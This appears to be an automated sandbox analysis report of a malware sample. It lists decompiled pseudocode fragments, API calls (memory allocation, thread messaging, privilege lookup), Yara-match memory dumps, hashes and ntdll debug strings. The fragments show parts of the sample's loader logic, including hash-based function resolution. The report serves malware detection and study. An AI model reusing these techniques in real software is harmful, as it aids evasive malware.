                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 0eff1f3a1da78b7e2ae0dee9c4d3c380858e8fe73344ae004333b44432362a1b
                                          • Instruction ID: 9344fdb57475838e8843889c56ecfbf53c8809c4df51adc41ba2a37e679dc5d7
                                          • Opcode Fuzzy Hash: 0eff1f3a1da78b7e2ae0dee9c4d3c380858e8fe73344ae004333b44432362a1b
                                          • Instruction Fuzzy Hash: 3BF03CB5200208ABCB10EF99DC85DEB77ADEF88364F11854AFE5C97281D634E9508BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00419F2D(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                          				intOrPtr _v117;
                                          				long _t16;
                                          				void* _t23;
                                          				void* _t24;
                                          
                                          				asm("bound esi, [esi]");
                                          				_v117();
                                          				_t4 = _a4 + 0xc60; // 0xca0
                                          				E0041A950(_t23, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30, _t24);
                                          				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                          				return _t16;
                                          			}







                                          0x00419f2d
                                          0x00419f2f
                                          0x00419f3f
                                          0x00419f47
                                          0x00419f69
                                          0x00419f6d

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 7578e27667dd9c6b3e4c9dabb41f2aaa1eeda76833debe7cfa1d839f5bf2ed05
                                          • Instruction ID: 38e4de3d10a0b26fbd05d6a43c61f977fec0be050730d6f047586e43723b4cab
                                          • Opcode Fuzzy Hash: 7578e27667dd9c6b3e4c9dabb41f2aaa1eeda76833debe7cfa1d839f5bf2ed05
                                          • Instruction Fuzzy Hash: B4F058B2200108AFCB24DF99CC81EEB77A8EF88350F118509FE49A7241C630E810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6b230cbff2933367e649220cb26c385f88a73e6ab73d2f393569aef6cb55be31
                                          • Instruction ID: c9f8808e1f06c46900b7c8adf83ed800a14a7b82f097fa5f9bc898d1586b4bc9
                                          • Opcode Fuzzy Hash: 6b230cbff2933367e649220cb26c385f88a73e6ab73d2f393569aef6cb55be31
                                          • Instruction Fuzzy Hash: 409002A174110452D10061994414B064095E7E1345FD1C015E1094594DCA59CC5671A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 15e365d88cc041173329ef930983d380daf90116b4d68cfb0f2b2c94d0c00e16
                                          • Instruction ID: 2a925c913d4eb14694f30305c9a07ae4016602b9f1b9202e429b6573b088cb38
                                          • Opcode Fuzzy Hash: 15e365d88cc041173329ef930983d380daf90116b4d68cfb0f2b2c94d0c00e16
                                          • Instruction Fuzzy Hash: ED9002B160110412D140719944047464095A7D0345FD1C011A5094594ECA998DD976E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c5a0fa1cec57d4d269b59d6ef0ee539898b49c144664688f15cb3d26a70f5744
                                          • Instruction ID: d8e52f15c7f924edadf17b995ec474168350a0365db13ea9293740be086422d0
                                          • Opcode Fuzzy Hash: c5a0fa1cec57d4d269b59d6ef0ee539898b49c144664688f15cb3d26a70f5744
                                          • Instruction Fuzzy Hash: 77900261A0110512D10171994404616409AA7D0285FD1C022A1054595ECE658996B1B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0bb241a068594bce0ea21ad88b7c3cd2aac9409c606675ab906e010aa91f5797
                                          • Instruction ID: 5d46f5170ff25ea85e63f61183180231fd813cb2bb7de440b37e3854bc595194
                                          • Opcode Fuzzy Hash: 0bb241a068594bce0ea21ad88b7c3cd2aac9409c606675ab906e010aa91f5797
                                          • Instruction Fuzzy Hash: E5900261642141625545B19944045078096B7E02857D1C012A1444990CC966985AE6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d00d9d68adcd620324ddbee2ebb4d6fd8a59ce00ecc81f187ce18a6c23b6f9e3
                                          • Instruction ID: 59d5c1e6039382d3cafc06334fa9545f16c273e9c02e43a8d977e68e81023970
                                          • Opcode Fuzzy Hash: d00d9d68adcd620324ddbee2ebb4d6fd8a59ce00ecc81f187ce18a6c23b6f9e3
                                          • Instruction Fuzzy Hash: 8D90027160110423D111619945047074099A7D0285FD1C412A0454598DDA968956B1A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 076fc5c8653c18727cb08bcb26cd61002988a18888d032100e8343d87520f6ce
                                          • Instruction ID: 5cad27c51edd512369f8100342d8c5ce731c028177fb122b0a2a6a4ded7fb80e
                                          • Opcode Fuzzy Hash: 076fc5c8653c18727cb08bcb26cd61002988a18888d032100e8343d87520f6ce
                                          • Instruction Fuzzy Hash: D890027160150412D1006199481470B4095A7D0346FD1C011A1194595DCA65885575F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e4fbcd8f6a9c65e88591ee136591a2b5f4feec7ad4c0fae48282e4018b452ff7
                                          • Instruction ID: 055e15fee905155aa8e077ab1c262a24af6adb894c7841596e7f97684aab97c6
                                          • Opcode Fuzzy Hash: e4fbcd8f6a9c65e88591ee136591a2b5f4feec7ad4c0fae48282e4018b452ff7
                                          • Instruction Fuzzy Hash: 20900261A0110052414071A988449068095BBE12557D1C121A09C8590DC999886966E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ef6462cb65273a2974faa4a9fdcca08ebe77662a9c0a2868872f17b870e71a58
                                          • Instruction ID: 5f46615f644c047551818c09a5d0f192ef81776ccb611028164636e70338ab1b
                                          • Opcode Fuzzy Hash: ef6462cb65273a2974faa4a9fdcca08ebe77662a9c0a2868872f17b870e71a58
                                          • Instruction Fuzzy Hash: 5C90026161190052D20065A94C14B074095A7D0347FD1C115A0184594CCD55886565A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4c66ff9a4478d9bbb8529203072200f47768c45a053c050e59cedf310584231a
                                          • Instruction ID: b941196addefbab8b7d9e6bc204d17f654ab9dd0e93f0d023cdf18e988a69181
                                          • Opcode Fuzzy Hash: 4c66ff9a4478d9bbb8529203072200f47768c45a053c050e59cedf310584231a
                                          • Instruction Fuzzy Hash: 579002A160210013410571994414616809AA7E0245BD1C021E10445D0DC965889571A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d5d54d3f5df9934613ecc23c4dfaac208e391d95c9a5fc2d4aa1f16aa5807245
                                          • Instruction ID: 7b1c29e1913b719bc1a99a1f8ae10bb685351eb83762f67df90c31ef63a89c25
                                          • Opcode Fuzzy Hash: d5d54d3f5df9934613ecc23c4dfaac208e391d95c9a5fc2d4aa1f16aa5807245
                                          • Instruction Fuzzy Hash: A9900265611100130105A599070450740D6A7D53953D1C021F1045590CDA61886561A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 26c548fb8cf0b607538dc16b72c5506fede83654446de4e2643b8267e6eed273
                                          • Instruction ID: 3049c52c52f2da07a432404f75d3d844a80808a0be47b1f87dc61e98c9418ac8
                                          • Opcode Fuzzy Hash: 26c548fb8cf0b607538dc16b72c5506fede83654446de4e2643b8267e6eed273
                                          • Instruction Fuzzy Hash: 0B90026961310012D1807199540860A4095A7D1246FD1D415A0045598CCD55886D63A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bcac8557cbb53d6f302ef4d0b50b96b2c8995c027f13cc91a4aa7a19caee01ab
                                          • Instruction ID: a148360f000a28055841a58aa698856f90b2f7742980597370012f7f713ae4ce
                                          • Opcode Fuzzy Hash: bcac8557cbb53d6f302ef4d0b50b96b2c8995c027f13cc91a4aa7a19caee01ab
                                          • Instruction Fuzzy Hash: DE90026170110013D140719954186068095F7E1345FD1D011E0444594CDD55885A62A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b0b9faa0300a28cad942a862bb63cbe14d5a5e0b0555760966327ce4671cd5b7
                                          • Instruction ID: fde6bc0deb1942b13568f6ec4f3988f1427fd826bf15c88435df177dac75a577
                                          • Opcode Fuzzy Hash: b0b9faa0300a28cad942a862bb63cbe14d5a5e0b0555760966327ce4671cd5b7
                                          • Instruction Fuzzy Hash: B990027160110412D10065D954086464095A7E0345FD1D011A5054595ECAA5889571B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4d3d3f8635f61a11a5c69434bf89ce03df3eb28c90c1b18323213dfa7f44694b
                                          • Instruction ID: 296d7441fc52b84d399a8ea8ded4211985a89714cab1c1a4fd7b2fd325e6600e
                                          • Opcode Fuzzy Hash: 4d3d3f8635f61a11a5c69434bf89ce03df3eb28c90c1b18323213dfa7f44694b
                                          • Instruction Fuzzy Hash: 8990027160118812D1106199840474A4095A7D0345FD5C411A4454698DCAD5889571A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 659df851a589f31a104e69e50ff901da85349300fdfe18a97256e1e6cfeeeaa4
                                          • Instruction ID: 8b314920335aec63b5ad1be2c2dce66182eeddbfc95289853701ea142d140646
                                          • Opcode Fuzzy Hash: 659df851a589f31a104e69e50ff901da85349300fdfe18a97256e1e6cfeeeaa4
                                          • Instruction Fuzzy Hash: DB90027160110812D1807199440464A4095A7D1345FD1C015A0055694DCE558A5D77E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                          • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                          • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                          • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: oLA
                                          • API String ID: 1279760036-3789366272
                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E004082E8(void* __eax, intOrPtr _a4, long _a8) {
                                          				char _v67;
                                          				char _v68;
                                          				long __edi;
                                          				signed int __esi;
                                          				void* __ebp;
                                          				void* _t10;
                                          
                                          				asm("xlatb");
                                          				_t10 = __eax + 0x6479b027;
                                          				if(_t10 <= 0) {
                                          					return _t10;
                                          				} else {
                                          					_push(__ebp);
                                          					__ebp = __esp;
                                          					__esp = __esp - 0x40;
                                          					_push(__esi);
                                          					__eax =  &_v67;
                                          					_v68 = 0;
                                          					E0041B850( &_v67, 0, 0x3f) = E0041C3F0( &_v68, 3);
                                          					_a4 = _a4 + 0x1c;
                                          					__eax = E0040ACC0(__eflags, _a4 + 0x1c,  &_v68); // executed
                                          					__eax = E00414E10(__esi, __eax, 0, 0, 0xc4e7b6d6);
                                          					__esi = __eax;
                                          					__eflags = __esi;
                                          					if(__esi != 0) {
                                          						_push(__edi);
                                          						__edi = _a8;
                                          						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
                                          						__eflags = __eax;
                                          						if(__eflags == 0) {
                                          							__eax = E0040A450(__eflags, 1, 8);
                                          							__eax = __al & 0x000000ff;
                                          							__eax =  *__esi(__edi, 0x8003, __ebp + (__al & 0x000000ff) - 0x40, __eax);
                                          						}
                                          						_pop(__edi);
                                          					}
                                          					_pop(__esi);
                                          					__esp = __ebp;
                                          					_pop(__ebp);
                                          					return __eax;
                                          				}
                                          			}









                                          0x004082e8
                                          0x004082e9
                                          0x004082ee
                                          0x00408285
                                          0x004082f0
                                          0x004082f0
                                          0x004082f1
                                          0x004082f3
                                          0x004082f6
                                          0x004082f9
                                          0x004082ff
                                          0x0040830e
                                          0x0040831a
                                          0x0040831e
                                          0x0040832e
                                          0x00408333
                                          0x00408338
                                          0x0040833a
                                          0x0040833c
                                          0x0040833d
                                          0x0040834a
                                          0x0040834c
                                          0x0040834e
                                          0x00408355
                                          0x0040835a
                                          0x0040836b
                                          0x0040836b
                                          0x0040836d
                                          0x0040836d
                                          0x0040836e
                                          0x0040836f
                                          0x00408371
                                          0x00408372
                                          0x00408372

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: f0663417be37ac60b37dcc60ca7b55f8b7b07ade5726b6813b2dfe337a929214
                                          • Instruction ID: f06a3c84731485efd8bcf30288739964e45de6767f589b29d5a6b80fc1befc2c
                                          • Opcode Fuzzy Hash: f0663417be37ac60b37dcc60ca7b55f8b7b07ade5726b6813b2dfe337a929214
                                          • Instruction Fuzzy Hash: 8A01DD31A803187BE720A6999D43FFF775CAB40F54F04416EFF04FA2C1D6A9691642EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                                          				char _v67;
                                          				char _v68;
                                          				void* _t12;
                                          				intOrPtr* _t13;
                                          				int _t14;
                                          				long _t21;
                                          				intOrPtr* _t25;
                                          				void* _t26;
                                          				void* _t30;
                                          
                                          				_t30 = __eflags;
                                          				_v68 = 0;
                                          				E0041B850( &_v67, 0, 0x3f);
                                          				E0041C3F0( &_v68, 3);
                                          				_t12 = E0040ACC0(_t30, _a4 + 0x1c,  &_v68); // executed
                                          				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                          				_t25 = _t13;
                                          				if(_t25 != 0) {
                                          					_t21 = _a8;
                                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                          					_t32 = _t14;
                                          					if(_t14 == 0) {
                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                          					}
                                          					return _t14;
                                          				}
                                          				return _t13;
                                          			}












                                          0x004082f0
                                          0x004082ff
                                          0x00408303
                                          0x0040830e
                                          0x0040831e
                                          0x0040832e
                                          0x00408333
                                          0x0040833a
                                          0x0040833d
                                          0x0040834a
                                          0x0040834c
                                          0x0040834e
                                          0x0040836b
                                          0x0040836b
                                          0x00000000
                                          0x0040836d
                                          0x00408372

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                          • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                          • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                          • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                          				int _t10;
                                          				void* _t15;
                                          				void* _t16;
                                          
                                          				E0041A950(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46, _t16);
                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}






                                          0x0041a1da
                                          0x0041a1f0
                                          0x00000000

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 25%
                                          			E0041A093(intOrPtr _a4, int _a8) {
                                          				void* _v117;
                                          				void* _t17;
                                          				void* _t18;
                                          
                                          				asm("out 0xc6, eax");
                                          				asm("adc eax, 0xdedc79bd");
                                          				_push(_t20);
                                          				E0041A950(_t17, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t18);
                                          				ExitProcess(_a8);
                                          			}






                                          0x0041a097
                                          0x0041a09a
                                          0x0041a0a0
                                          0x0041a0ba
                                          0x0041a0c8

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: d9c01e5a3c422b94e36911743212c275044931fd0de9522d023e229b378728c8
                                          • Instruction ID: 96223a1bc6ccf3356219dfdf91af698a6a08d6865a6f0096201850352eee1577
                                          • Opcode Fuzzy Hash: d9c01e5a3c422b94e36911743212c275044931fd0de9522d023e229b378728c8
                                          • Instruction Fuzzy Hash: 75E026706002047FD720CB74CC86FDB3FA8CF5D390F148199BC4997342C630A900CAA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A0A0(intOrPtr _a4, int _a8) {
                                          				void* _t10;
                                          				void* _t11;
                                          
                                          				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t11);
                                          				ExitProcess(_a8);
                                          			}





                                          0x0041a0ba
                                          0x0041a0c8

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3eff44def22108ec5dbbe3f68b1dcafc877c67398bb2adce5e5a735e0d3679b8
                                          • Instruction ID: c7701838e11ab0b4b1231229e905ea5f0cbe43b3a03b19830d0cd5296e4b5a0f
                                          • Opcode Fuzzy Hash: 3eff44def22108ec5dbbe3f68b1dcafc877c67398bb2adce5e5a735e0d3679b8
                                          • Instruction Fuzzy Hash: 04B02B71C010C0C5EB01D3A80608717794077C0309F52C011D1060280B4738C080F1F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Strings
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01A0B305
                                          • *** Inpage error in %ws:%s, xrefs: 01A0B418
                                          • The resource is owned exclusively by thread %p, xrefs: 01A0B374
                                          • The instruction at %p tried to %s , xrefs: 01A0B4B6
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01A0B323
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01A0B48F
                                          • read from, xrefs: 01A0B4AD, 01A0B4B2
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01A0B39B
                                          • *** then kb to get the faulting stack, xrefs: 01A0B51C
                                          • *** enter .exr %p for the exception record, xrefs: 01A0B4F1
                                          • The critical section is owned by thread %p., xrefs: 01A0B3B9
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01A0B484
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01A0B352
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01A0B2F3
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01A0B2DC
                                          • <unknown>, xrefs: 01A0B27E, 01A0B2D1, 01A0B350, 01A0B399, 01A0B417, 01A0B48E
                                          • The instruction at %p referenced memory at %p., xrefs: 01A0B432
